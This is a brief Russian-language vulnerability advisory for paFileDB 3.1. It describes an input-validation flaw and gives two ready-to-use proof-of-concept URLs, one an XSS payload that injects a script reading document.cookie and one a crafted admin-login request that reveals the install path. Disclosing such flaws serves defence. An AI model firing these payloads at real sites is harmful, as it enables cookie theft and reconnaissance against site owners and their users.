Программа: paFileDB 3.1
Уязвимость в проверке правильности входных данных обнаружена в paFileDB. Удаленный пользователь может выполнить XSS нападение и определить инсталляционный путь.
1. XSS:
http://localhost/pafiledb.php?action=category&id=' <script>alert(document.cookie);</script>
2. Раскрытие пути:
http://site/includes/admin/login.php?formname= DarkBicho&formpass=DarkBicho&B1=
%3E%3E+Log+In+%3C%3C&action= admin&login=do